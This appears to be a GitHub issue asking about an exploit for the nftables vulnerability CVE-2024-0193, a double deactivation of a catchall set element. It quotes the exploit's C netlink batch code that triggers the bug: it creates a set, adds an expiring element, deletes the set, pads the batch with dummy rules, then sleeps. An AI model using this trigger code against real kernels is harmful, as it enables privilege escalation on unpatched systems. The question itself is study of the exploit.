Some Question about nftables in CVE-2024-0193 #198
Description
The vulnerability is deacvtivate catchall elem many time. But it constructs new_pipapo_set , new_set_elem_with_expiration , del_set to trig the vul. It will deactivate elem first in nft_delset func and when elem is expired, elem will be deactivated again in nft_pipapo_commit func. Why usleep function is below sending batch msg
batch = mnl_nlmsg_batch_start(buf, buf_size);
nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWSET, family, NLM_F_CREATE, seq++);
nftnl_set_nlmsg_build_payload(nlh, set1);
mnl_nlmsg_batch_next(batch);
nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWSETELEM, family, NLM_F_CREATE, seq++);
nftnl_set_elems_nlmsg_build_payload(nlh, set1_elem);
mnl_nlmsg_batch_next(batch);
nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELSET, family, 0, seq++);
nftnl_set_nlmsg_build_payload(nlh, set1);
mnl_nlmsg_batch_next(batch);
// delay
for(int i = 0 ; i < 0x800; i++){
nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++);
nftnl_rule_nlmsg_build_payload(nlh, rule_dummy);
mnl_nlmsg_batch_next(batch);
}
nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) {
err(1, "mnl_socket_send");
}
// wait for destroy work (triggering the vulnerability)
usleep(300*1000); //why here below msg